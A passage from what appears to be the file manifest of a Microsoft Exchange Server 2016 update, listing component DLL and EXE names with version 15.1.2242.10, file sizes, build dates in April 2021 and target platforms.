15.1.2242.10| 135,560| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.monitoring.activemonitoring.local.components.dll| 15.1.2242.10| 5,156,752| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.monitoring.servicecontextprovider.dll| 15.1.2242.10| 19,856| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.mrsmlbconfiguration.dll| 15.1.2242.10| 68,488| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.net.dll| 15.1.2242.10| 5,084,048| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.net.rightsmanagement.dll| 15.1.2242.10| 265,608| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.networksettings.dll| 15.1.2242.10| 37,752| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.notifications.broker.eventlog.dll| 15.1.2242.10| 14,224| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.notifications.broker.exe| 15.1.2242.10| 549,768| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.oabauthmodule.dll| 15.1.2242.10| 22,904| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.oabrequesthandler.dll| 15.1.2242.10| 106,384| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.oauth.core.dll| 15.1.2242.10| 291,728| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.objectstoreclient.dll| 15.1.2242.10| 17,288| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.odata.configuration.dll| 15.1.2242.10| 277,880| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.odata.dll| 15.1.2242.10| 2,992,528| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.officegraph.common.dll| 15.1.2242.10| 88,968| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.officegraph.grain.dll| 15.1.2242.10| 101,776| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.officegraph.graincow.dll| 15.1.2242.10| 38,264| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.officegraph.graineventbasedassistants.dll| 15.1.2242.10| 45,448| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.officegraph.grainpropagationengine.dll| 15.1.2242.10| 58,256| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.officegraph.graintransactionstorage.dll| 15.1.2242.10| 147,344| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.officegraph.graintransportdeliveryagent.dll| 15.1.2242.10| 26,488| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.officegraph.graphstore.dll| 15.1.2242.10| 184,208| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.officegraph.permailboxkeys.dll| 15.1.2242.10| 26,512| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.officegraph.secondarycopyquotamanagement.dll| 15.1.2242.10| 38,280| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.officegraph.secondaryshallowcopylocation.dll| 15.1.2242.10| 55,696| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.officegraph.security.dll| 15.1.2242.10| 147,336| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.officegraph.semanticgraph.dll| 15.1.2242.10| 191,864| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.officegraph.tasklogger.dll| 15.1.2242.10| 33,672| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.partitioncache.dll| 15.1.2242.10| 28,048| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.passivemonitoringsettings.dll| 15.1.2242.10| 32,648| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.photogarbagecollectionservicelet.dll| 15.1.2242.10| 15,224| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.pop3.eventlog.dll| 15.1.2242.10| 17,296| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.pop3.eventlog.dll.fe| 15.1.2242.10| 17,296| 27-Apr-21| 12:50| Not applicable \nMicrosoft.exchange.pop3.exe| 15.1.2242.10| 106,872| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.pop3.exe.fe| 15.1.2242.10| 106,872| 27-Apr-21| 12:50| Not applicable \nMicrosoft.exchange.pop3service.exe| 15.1.2242.10| 24,968| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.pop3service.exe.fe| 15.1.2242.10| 24,968| 27-Apr-21| 12:50| Not applicable \nMicrosoft.exchange.popconfiguration.dl1| 15.1.2242.10| 42,888| 27-Apr-21| 12:48| Not applicable \nMicrosoft.exchange.popimap.core.dll| 15.1.2242.10| 264,080| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.popimap.core.dll.fe| 15.1.2242.10| 264,080| 27-Apr-21| 12:50| Not applicable \nMicrosoft.exchange.powersharp.dll| 15.1.2242.10| 358,264| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.powersharp.management.dll| 15.1.2242.10| 4,168,080| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.powershell.configuration.dll| 15.1.2242.10| 326,024| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.powershell.rbachostingtools.dll| 15.1.2242.10| 41,352| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.protectedservicehost.exe| 15.1.2242.10| 30,584| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.protocols.fasttransfer.dll| 15.1.2242.10| 135,048| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.protocols.mapi.dll| 15.1.2242.10| 436,624| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.provisioning.eventlog.dll| 15.1.2242.10| 14,224| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.provisioningagent.dll| 15.1.2242.10| 224,144| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.provisioningservicelet.dll| 15.1.2242.10| 105,848| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.pst.dll| 15.1.2242.10| 168,840| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.pst.dll.deploy| 15.1.2242.10| 168,840| 27-Apr-21| 12:48| Not applicable \nMicrosoft.exchange.pswsclient.dll| 15.1.2242.10| 259,464| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.publicfolders.dll| 15.1.2242.10| 72,072| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.pushnotifications.crimsonevents.dll| 15.1.2242.10| 215,944| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.pushnotifications.dll| 15.1.2242.10| 106,872| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.pushnotifications.publishers.dll| 15.1.2242.10| 425,848| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.pushnotifications.server.dll| 15.1.2242.10| 70,520| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.query.analysis.dll| 15.1.2242.10| 46,472| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.query.configuration.dll| 15.1.2242.10| 206,720| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.query.core.dll| 15.1.2242.10| 163,208| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.query.ranking.dll| 15.1.2242.10| 342,408| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.query.retrieval.dll| 15.1.2242.10| 149,368| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.query.suggestions.dll| 15.1.2242.10| 95,120| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.realtimeanalyticspublisherservicelet.dll| 15.1.2242.10| 127,360| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.relevance.core.dll| 15.1.2242.10| 63,352| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.relevance.data.dll| 15.1.2242.10| 36,752| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.relevance.mailtagger.dll| 15.1.2242.10| 17,784| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.relevance.people.dll| 15.1.2242.10| 9,666,960| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.relevance.peopleindex.dll| 15.1.2242.10| #########| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.relevance.peopleranker.dll| 15.1.2242.10| 36,736| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.relevance.perm.dll| 15.1.2242.10| 97,672| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.relevance.sassuggest.dll| 15.1.2242.10| 28,536| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.relevance.upm.dll| 15.1.2242.10| 72,072| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.routing.client.dll| 15.1.2242.10| 15,744| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.routing.eventlog.dll| 15.1.2242.10| 13,176| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.routing.server.exe| 15.1.2242.10| 59,272| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.rpc.dll| 15.1.2242.10| 1,639,288| 27-Apr-21| 12:49| x64 \nMicrosoft.exchange.rpcclientaccess.dll| 15.1.2242.10| 209,800| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.rpcclientaccess.exmonhandler.dll| 15.1.2242.10| 60,296| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.rpcclientaccess.handler.dll| 15.1.2242.10| 517,512| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.rpcclientaccess.monitoring.dll| 15.1.2242.10| 161,144| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.rpcclientaccess.parser.dll| 15.1.2242.10| 721,784| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.rpcclientaccess.server.dll| 15.1.2242.10| 243,088| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.rpcclientaccess.service.eventlog.dll| 15.1.2242.10| 20,880| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.rpcclientaccess.service.exe| 15.1.2242.10| 35,216| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.rpchttpmodules.dll| 15.1.2242.10| 42,384| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.dll| 15.1.2242.10| 56,184| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.eventlog.dll| 15.1.2242.10| 27,536| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.rules.common.dll| 15.1.2242.10| 130,424| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.saclwatcher.eventlog.dll| 15.1.2242.10| 14,720| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.saclwatcherservicelet.dll| 15.1.2242.10| 20,344| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.safehtml.dll| 15.1.2242.10| 21,368| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.sandbox.activities.dll| 15.1.2242.10| 267,640| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.sandbox.contacts.dll| 15.1.2242.10| 110,992| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.sandbox.core.dll| 15.1.2242.10| 112,520| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.sandbox.services.dll| 15.1.2242.10| 622,472| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.search.bigfunnel.dll| 15.1.2242.10| 162,168| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.search.bigfunnel.eventlog.dll| 15.1.2242.10| 12,176| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.search.blingwrapper.dll| 15.1.2242.10| 19,336| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.search.core.dll| 15.1.2242.10| 209,800| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.search.ediscoveryquery.dll| 15.1.2242.10| 17,808| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.search.engine.dll| 15.1.2242.10| 96,656| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.search.fast.configuration.dll| 15.1.2242.10| 16,760| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.search.fast.dll| 15.1.2242.10| 435,064| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.search.files.dll| 15.1.2242.10| 274,296| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.search.flighting.dll| 15.1.2242.10| 24,968| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.search.mdb.dll| 15.1.2242.10| 219,024| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.search.service.exe| 15.1.2242.10| 26,512| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.security.applicationencryption.dll| 15.1.2242.10| 162,184| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.security.dll| 15.1.2242.10| 1,555,832| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.security.msarpsservice.exe| 15.1.2242.10| 19,848| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.security.securitymsg.dll| 15.1.2242.10| 28,560| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.server.storage.admininterface.dll| 15.1.2242.10| 222,600| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.server.storage.common.dll| 15.1.2242.10| 1,110,920| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.server.storage.diagnostics.dll| 15.1.2242.10| 212,344| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.server.storage.directoryservices.dll| 15.1.2242.10| 113,544| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.server.storage.esebackinterop.dll| 15.1.2242.10| 82,824| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.server.storage.eventlog.dll| 15.1.2242.10| 80,760| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.server.storage.fulltextindex.dll| 15.1.2242.10| 66,432| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.server.storage.ha.dll| 15.1.2242.10| 81,288| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.server.storage.lazyindexing.dll| 15.1.2242.10| 208,272| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.server.storage.logicaldatamodel.dll| 15.1.2242.10| 1,163,144| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.server.storage.mapidisp.dll| 15.1.2242.10| 504,184| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.server.storage.multimailboxsearch.dll| 15.1.2242.10| 47,496| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.server.storage.physicalaccess.dll| 15.1.2242.10| 848,248| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.server.storage.propertydefinitions.dll| 15.1.2242.10| 1,219,960| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.server.storage.propertytag.dll| 15.1.2242.10| 30,600| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.server.storage.rpcproxy.dll| 15.1.2242.10| 120,720| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.server.storage.storecommonservices.dll| 15.1.2242.10| 1,009,544| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.server.storage.storeintegritycheck.dll| 15.1.2242.10| 110,984| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.server.storage.workermanager.dll| 15.1.2242.10| 34,696| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.server.storage.xpress.dll| 15.1.2242.10| 19,320| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.servicehost.eventlog.dll| 15.1.2242.10| 14,736| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.servicehost.exe| 15.1.2242.10| 60,816| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.dll| 15.1.2242.10| 50,576| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.eventlog.dll| 15.1.2242.10| 14,224| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.servicelets.unifiedpolicysyncservicelet.eventlog.dll| 15.1.2242.10| 14,216| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.services.common.dll| 15.1.2242.10| 74,104| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.services.dll| 15.1.2242.10| 8,476,560| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.services.eventlogs.dll| 15.1.2242.10| 30,072| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.services.ewshandler.dll| 15.1.2242.10| 633,736| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.services.ewsserialization.dll| 15.1.2242.10| 1,651,088| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.services.json.dll| 15.1.2242.10| 296,336| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.services.messaging.dll| 15.1.2242.10| 43,392| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.services.onlinemeetings.dll| 15.1.2242.10| 233,352| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.services.surface.dll| 15.1.2242.10| 178,576| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.services.wcf.dll| 15.1.2242.10| 348,552| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.setup.acquirelanguagepack.dll| 15.1.2242.10| 56,720| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.setup.bootstrapper.common.dll| 15.1.2242.10| 94,600| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.setup.common.dll| 15.1.2242.10| 297,336| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.setup.commonbase.dll| 15.1.2242.10| 35,704| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.setup.console.dll| 15.1.2242.10| 27,016| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.setup.gui.dll| 15.1.2242.10| 115,072| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.setup.parser.dll| 15.1.2242.10| 54,160| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.setup.signverfwrapper.dll| 15.1.2242.10| 75,136| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.sharedcache.caches.dll| 15.1.2242.10| 142,712| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.sharedcache.client.dll| 15.1.2242.10| 24,968| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.sharedcache.eventlog.dll| 15.1.2242.10| 15,240| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.sharedcache.exe| 15.1.2242.10| 58,768| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.sharepointsignalstore.dll| 15.1.2242.10| 27,016| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.slabmanifest.dll| 15.1.2242.10| 46,984| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.sqm.dll| 15.1.2242.10| 46,968| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.store.service.exe| 15.1.2242.10| 28,024| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.store.worker.exe| 15.1.2242.10| 26,488| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.storeobjectsservice.eventlog.dll| 15.1.2242.10| 13,688| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.storeobjectsservice.exe| 15.1.2242.10| 31,632| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.storeprovider.dll| 15.1.2242.10| 1,166,728| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.structuredquery.dll| 15.1.2242.10| 158,584| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.symphonyhandler.dll| 15.1.2242.10| 628,104| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.syncmigration.eventlog.dll| 15.1.2242.10| 13,176| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.syncmigrationservicelet.dll| 15.1.2242.10| 16,264| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.systemprobemsg.dll| 15.1.2242.10| 13,176| 27-Apr-21| 12:49| x64 \nMicrosoft.exchange.textprocessing.dll| 15.1.2242.10| 221,576| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.textprocessing.eventlog.dll| 15.1.2242.10| 13,704| 27-Apr-21| 12:49| x64 \nMicrosoft.exchange.transport.agent.addressbookpolicyroutingagent.dll| 15.1.2242.10| 29,048| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.agent.antispam.common.dll| 15.1.2242.10| 138,616| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.agent.contentfilter.cominterop.dll| 15.1.2242.10| 21,904| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.agent.controlflow.dll| 15.1.2242.10| 40,312| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.agent.faultinjectionagent.dll| 15.1.2242.10| 22,920| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.agent.frontendproxyagent.dll| 15.1.2242.10| 21,368| 27-Apr-21| 12:51| x86 \nMicrosoft.exchange.transport.agent.hygiene.dll| 15.1.2242.10| 212,344| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.transport.agent.interceptoragent.dll| 15.1.2242.10| 98,696| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.agent.liveidauth.dll| 15.1.2242.10| 22,920| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.transport.agent.malware.dll| 15.1.2242.10| 169,352| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.agent.malware.eventlog.dll| 15.1.2242.10| 18,312| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.transport.agent.phishingdetection.dll| 15.1.2242.10| 20,880| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.agent.prioritization.dll| 15.1.2242.10| 31,624| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.transport.agent.protocolanalysis.dbaccess.dll| 15.1.2242.10| 46,968| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.agent.search.dll| 15.1.2242.10| 30,072| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.agent.senderid.core.dll| 15.1.2242.10| 53,136| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.agent.sharedmailboxsentitemsroutingagent.dll| 15.1.2242.10| 44,928| 27-Apr-21| 12:51| x86 \nMicrosoft.exchange.transport.agent.systemprobedrop.dll| 15.1.2242.10| 18,312| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.agent.transportfeatureoverrideagent.dll| 15.1.2242.10| 46,472| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.agent.trustedmailagents.dll| 15.1.2242.10| 46,472| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.transport.cloudmonitor.common.dll| 15.1.2242.10| 28,024| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.common.dll| 15.1.2242.10| 457,080| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.transport.contracts.dll| 15.1.2242.10| 18,296| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.decisionengine.dll| 15.1.2242.10| 30,608| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.transport.dll| 15.1.2242.10| 4,181,880| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.transport.dsapiclient.dll| 15.1.2242.10| 182,144| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.eventlog.dll| 15.1.2242.10| 121,744| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.transport.extensibility.dll| 15.1.2242.10| 403,344| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.extensibilityeventlog.dll| 15.1.2242.10| 14,728| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.transport.flighting.dll| 15.1.2242.10| 86,928| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.transport.logging.dll| 15.1.2242.10| 88,952| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.logging.search.dll| 15.1.2242.10| 68,488| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.transport.loggingcommon.dll| 15.1.2242.10| 63,368| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.transport.monitoring.dll| 15.1.2242.10| 430,480| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.net.dll| 15.1.2242.10| 122,248| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.protocols.contracts.dll| 15.1.2242.10| 17,784| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.protocols.dll| 15.1.2242.10| 29,048| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.protocols.httpsubmission.dll| 15.1.2242.10| 60,816| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.requestbroker.dll| 15.1.2242.10| 50,064| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.transport.scheduler.contracts.dll| 15.1.2242.10| 33,144| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.scheduler.dll| 15.1.2242.10| 113,040| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.smtpshared.dll| 15.1.2242.10| 18,320| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.storage.contracts.dll| 15.1.2242.10| 52,104| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.storage.dll| 15.1.2242.10| 675,192| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.transport.storage.management.dll| 15.1.2242.10| 21,896| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.sync.agents.dll| 15.1.2242.10| 17,784| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.sync.common.dll| 15.1.2242.10| 487,296| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.sync.common.eventlog.dll| 15.1.2242.10| 12,680| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.transport.sync.manager.dll| 15.1.2242.10| 306,040| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.sync.manager.eventlog.dll| 15.1.2242.10| 15,752| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.transport.sync.migrationrpc.dll| 15.1.2242.10| 46,480| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.sync.worker.dll| 15.1.2242.10| 1,044,352| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.transport.sync.worker.eventlog.dll| 15.1.2242.10| 15,248| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.transportlogsearch.eventlog.dll| 15.1.2242.10| 18,808| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.transportsyncmanagersvc.exe| 15.1.2242.10| 18,824| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.um.callrouter.exe| 15.1.2242.10| 22,392| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.um.clientstrings.dll| 15.1.2242.10| 60,280| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.um.grammars.dll| 15.1.2242.10| 211,848| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.um.lad.dll| 15.1.2242.10| 120,720| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.um.prompts.dll| 15.1.2242.10| 214,912| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.um.troubleshootingtool.shared.dll| 15.1.2242.10| 118,672| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.um.ucmaplatform.dll| 15.1.2242.10| 239,488| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.um.umcommon.dll| 15.1.2242.10| 925,064| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.um.umcore.dll| 15.1.2242.10| 1,471,888| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.um.umvariantconfiguration.dll| 15.1.2242.10| 32,656| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.unifiedcontent.dll| 15.1.2242.10| 41,864| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.unifiedcontent.exchange.dll| 15.1.2242.10| 24,976| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.unifiedmessaging.eventlog.dll| 15.1.2242.10| 130,424| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.unifiedpolicyfilesync.eventlog.dll| 15.1.2242.10| 15,240| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.unifiedpolicyfilesyncservicelet.dll| 15.1.2242.10| 83,320| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.unifiedpolicysyncservicelet.dll| 15.1.2242.10| 50,040| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.variantconfiguration.antispam.dll| 15.1.2242.10| 642,440| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.variantconfiguration.core.dll| 15.1.2242.10| 186,256| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.variantconfiguration.dll| 15.1.2242.10| 67,448| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.variantconfiguration.eventlog.dll| 15.1.2242.10| 12,688| 27-Apr-21| 12:49| x64 \nMicrosoft.exchange.variantconfiguration.excore.dll| 15.1.2242.10| 56,696| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.variantconfiguration.globalsettings.dll| 15.1.2242.10| 27,512| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.variantconfiguration.hygiene.dll| 15.1.2242.10| 120,712| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.variantconfiguration.protectionservice.dll| 15.1.2242.10| 31,624| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.variantconfiguration.threatintel.dll| 15.1.2242.10| 57,224| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.webservices.auth.dll| 15.1.2242.10| 35,728| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.webservices.dll| 15.1.2242.10| 1,054,096| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.webservices.xrm.dll| 15.1.2242.10| 67,976| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.wlmservicelet.dll| 15.1.2242.10| 23,432| 27-Apr-21| 